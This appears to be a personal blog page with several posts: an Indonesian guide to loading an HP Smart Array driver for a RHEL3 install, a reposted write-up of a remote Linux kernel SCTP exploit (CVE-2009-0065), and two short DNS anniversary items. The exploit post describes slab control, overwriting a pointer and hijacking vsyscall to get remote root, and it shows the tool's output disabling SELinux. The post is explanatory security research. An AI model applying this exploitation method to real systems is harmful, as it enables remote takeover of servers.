Notepad ~Angky R~

Wuuuiiih,
Akhirnya bisa juga nih install Si Topi Miring (eh Merah) Enterprise 3 Update 5 di server HP DL380 G5 setelah seminggu “ulukutek” (ngoprek+puciiing) gara2 si HP smart Array E200/128 Controller yang ngak kedetek sama kernelnya RLEL3 U5 (2.4.21-32).

Ternyata beda versi kernel jelas beda versi driver, dan jika kita cari di hp smart array itu ternyata cuma ada untuk RHEL3 U6 ke atas, nah kita kan meneketehe secara kita kan baru install RHEL versi license di server HP (maklum biasa yang free dan server abal-abal) jadi deh pusing minta ampun, mana ngak ada floppy drive yg nemplok di server lagi dan si HP cuma menyediakan file .dd yang harus di extract di floppy disk, untungnya dikantor ada floppy driver usb

Nah jadi kalo kita pake RHEL 3 U5, itu harus pake driver cpq_cciss-2.4.64-6.rhel3.i686.dd, sedangkan si HP kalo kita cari berdasarkan driver controller E200/128 itu dikasihnya yang cpq_cciss-2.4.64-7.rhel3.i686.dd.gz, jadinya error terus pas load drivernya.

Nah, berikut langkah yang dilakukan
1. download cpq_cciss-2.4.64-6.rhel3.i686.dd.gz (kalo link ini dah ilang, download aja di mirror ku )
2. extract file cpq_cciss-2.4.64-6.rhel3.i686.dd.gz
3. pake bantuan dosutil/rawwritewin.exe kita bikin disket image
- jalankan aplikasi rawritewin.exe, trus tunjuk filenya
4. atau kalo pake linux, pake commend dd
- dd if=cpq_cciss-2.4.64-6.rhel3.i686.dd of=/dev/flo bs=1400k (dimana kondisi device floppy ada di /dev/flo dan jangan dimounting)
5. setelah disket image dibuat, langsung aja masukin CD1 RHEL3 dan booting CDROM di server
6. Setelah masuk booting linux, nanti akan ditanya untuk boot option pas mau load kernel, jalankan command
- boot: linux dd (proses ini, biasanya ada time sekitar 5 detik, kalo di diemin itu akan langsung boot kernel untuk installasi tapi standard load kernel)
7. Setelah masuk proses installasi, baisanya akan ditanya untuk melakukan load driver via device nah ini kita harus pilih load driver agar driver yang sudah kita buat jadi disket image bisa di load oleh kernel, dan proses ini yg paling penting agar si HP smart Array bisa terdetek oleh kernel.
8. jika tidak ada error, berarti proses load driver sudah berhasil dan ikuti langkah selanjutnya untuk proses installasi.
9. Bersyukur deh sama Alloh

Ok sekian dulu, mudah-mudahan tulisan ni bermanfaat bagi kita semua.

Thanks to:
- Alloh swt
- My wife
- Cyrilla fedora kaffah (My daughter)
- Becks Grohl (si kupret ilham)
- Om Choiri (atas koreksinya, yg bener rawwritewin.exe )
- uncle Google
- HP
- RH
- All people in the world

Ref:
www.google.com
HP Smart Array E200/128 RHEL3

~Angky R~

Bookmark this page?

“Buffer overflow in net/sctp/sm_statefuns.c in the Stream Control Transmission Protocol (sctp) implementation in the Linux kernel before 2.6.28-git8 allows remote attackers to have an unknown impact via an FWD-TSN (aka FORWARD-TSN) chunk with a large stream ID. ”

“The SCTP stack did not correctly validate FORWARD-TSN packets. A remote attacker could send specially crafted SCTP traffic causing a system crash, leading to a denial of service. (CVE-2009-0065)”

“a buffer overflow was found in the Linux kernel Partial Reliable Stream
Control Transmission Protocol (PR-SCTP) implementation.
This could, potentially, lead to a denial of service if a Forward-TSN chunk is received
with a large stream ID. (CVE-2009-0065, Important) ”

Potentially a DoS? Unknown Impact? Really?

I’m wondering why kernel developers (or vendors?) continue to claim that kernel memory corruption are just Denial of Service. Most of the times they _are_ exploitable.. yes, even when the vulnerability is remotely triggered, yes.. even when the corruption takes place in a freaking slub in the middle of a kernel _heap_ .. yes even when you have kernel data pages marked NX and the kernel .text read-only and yes, absolutely yes even when you start only with a 16bit displacement…

Last month one of my customer (that has a _custom_ deployed sctp application on his network ) asked me if the vulnerability may have some impact on his systems. The answer? “Yes it does”, and since someone thinks that is not exploitable and someone else speculates over a possible locally privilege escalation only (with remote host sending TSN packet) i decided to write a completely remote exploit.

It is extremely reliable (nearly one-shot always), given that you know the target kernel. I tested it on Ubuntu 8.04 and Ubuntu 8.10
server boxes running with different kernels (ubuntu kernel for amd64) and on OpenSuse11.1 and a Fedora Core 10 (yes, extra-brownie points here, it works great on Selinux too). …

I dont want to talk about the exploit, because the code should be self explanatory, but i’d like to briefly explore the vulnerability:

From an exploit writer point of view, the most critical points are: where the memory corruption occurs, when it occurs and what type of data structures are involved. The code that triggers the overflow is on sctp_ssn_skip() in the file: /net/sctp/structs.h:

Parameter “id” is not checked and later used as an index referenced by stream->ssn pointer: a 16bit value.
We can only overwrite memory _close_ the the struct involved.

Let’s take a look at the sctp_stream structure and its stream pointer..
sctp_ssnmap_new() and sctp_ssnmap_init() function are in /net/sctp/ssnmap.c

Structures involved in streams mapping are:

struct sctp_stream {
__u16 *ssn;
unsigned int len;
};

struct sctp_ssnmap {
struct sctp_stream in;
struct sctp_stream out;
int malloced;
};

The code that allocates them is the following:

#define MAX_KMALLOC_SIZE 131072 //0×20000
…
size = sctp_ssnmap_size(in, out);
if (size <= MAX_KMALLOC_SIZE) retval = kmalloc(size, gfp);

If the size is under the MAX_KMALLOC_SIZE threshold the function dynamically allocates the sctp_ssnmap struct using as a parameter the number of in and out streams.
That’s good news! Manipulating sctp handshake options we can arbitrary (if the sctp application has no application-level checks on, f.e., the number of simultaneously opened SCTP streams) decide the slab that will be used to allocate the chunk.

Immediately after that, the function calls sctp_ssnmap_init() to initialize in/out stream pointers:

static struct sctp_ssnmap *sctp_ssnmap_init(struct sctp_ssnmap *map, __u16 in, __u16 out)
{
memset(map, 0×00, sctp_ssnmap_size(in, out));

/* Start ‘in’ stream just after the map header. */
map->in.ssn = (__u16 *)&map[1]; <— stream in init
map->in.len = in;

/* Start ‘out’ stream just after ‘in’. */
map->out.ssn = &map->in.ssn[in]; <— stream out init
map->out.len = out;

return map;
}

Again, good news. The stream pointers are self-contained. They point inside the previously allocated buffer, and more precisely the input stream is located exactly after the header. No kfree() will ever be called on these pointers: in other words they are a safe place to overwrite, and there’s no need to worry about post-exploitation recovery.

The last thing that may complicate a bit the exploit is a check that the kernel makes before invoking sctp_ssn_skip():

/net/sctp/ulpqueue.c: sctp_ulpk_skip() :

if (SSN_lt(ssn, sctp_ssn_peek(in, sid))) <— check
return;

/* Mark that we are no longer expecting this SSN or lower. */
sctp_ssn_skip(in, sid, ssn);

with SSN_lt():

enum {
SSN_SIGN_BIT = (1<<15)>

Strictly speaking this code checks if the value we are overwriting (the old SSN content) is greater or equal to the new value: if so it doesn’t process the FWD chunk. The comparison here is made using Serial Number Arithmetic (like the one used for protocol sequence number (eg. tcp seq number)) and can be fooled writing multiple chunks until it legally wraps around to a well known defined value.

Then, at this point, if we know the target running kernel, we can:

1) Control the slab/slub to be used
2) Overwrite a safe pointer close to the overflowing buffer
3) Easily control overwritten data..

.. in other words..
..
#./sctp_houdini -H 192.168.200.1 -P 5555 -h 192.168.200.10 -p 20000 -s 15000 -c 700 -t fedora64_10-2.6.25-117
[**] Monitoring Network for TSN/VTAG pairs..
[**] Start flushing slub cache…
[**] Using TSN/VTAG pairs: (TSN: 28022e8 <=> VTAG: 41fdd4fb) / (TSN: 8cafd3ae <=> VTAG: 1a99396c)…
[**] Overwriting neightboard sctp map..
[**] Disabling Selinux Enforcing Mode..
[**] Overwriting neightboard sctp map ……
[**] Overwriting vsyscall shadow map..
[**] Hijacking vsyscall shadow map..
[**] Waiting daemons executing gettimeofday().. this can take up to one minute…
[**] ….
[**] Connected!
[**] Restoring vsys: Emulate gettimeofday()…
uid=0(root) gid=0(root) groups=51(smmsp) context=system_u:system_r:sendmail_t:s0

GAME OVER

The exploit code can be downloaded here.

Ref:
- milis tetangga
- http://kernelbof.blogspot.com/

Thanks,
~ Angky. R ~

Bookmark this page?

Twenty five years ago Monday, two computer scientists at the University of Southern California created a key component essential to the modern Internet.

Jon Postel and Paul Mockapetris ran the first successful test of the automated domain name system, or DNS, which allows computers to find each other on the network and send information back and forth to each other without having humans manually look up the addresses of each machine.

The concept sounds simple now, but it was revolutionary 25 years ago. “Just like the white pages, you had to look up” the addresses of computers to exchange information, said Joe Touch, director of the Postel Center for Experimental Networking. “The telephone book got too heavy and too old too fast.” The innovation was “like calling 411.”

The anniversary of the event will go mostly unnoticed Monday, but the scientists at USC’s Information Sciences Institute will celebrate with a private champagne popping at the Postel Center.

DNS remains almost exactly as it was 25 years ago, and the system should be able to expand along with the Internet for the foreseeable future, said Mockapetris. The next big enhancement will be to make it more secure.

“The system was built to expand but not necessarily to be secure,” said Herbert Schorr, executive director of the Information Sciences Institute. The fundamental information to make the whole thing work, for example, still lives on just 12 so-called root servers. “It can be brought down. You have to be technically proficient, but there are enough people who can do it,” Schorr said.

Schorr said the most likely miscreant won’t be a spike-haired hacker. More likely, it will be “blocks of office buildings in a foreign capital somewhere,” he said.

Article from: wired

Thanks,
~Angky R~

Bookmark this page?

I have invitation from DNSstuff to attend a roundtable event celebrating the 25th Anniversary of DNS! The most influential DNS experts in the industry will be represented – including the father of DNS – Paul Mockapetris.

Seated at the DNS expert Roundtable:
- Paul Parisi, CTO of DNSstuff.com – Speaker and Moderator
- Paul Mockapetris, Inventor of DNS
- Cricket Liu, DNS expert & Author
- Paul Vixie, Author & Architect of BIND

This team will discuss why DNS is necessary, what the state of DNS is now and what the future holds.
Click here to Register Today!

Thanks,
~Angky R~

Bookmark this page?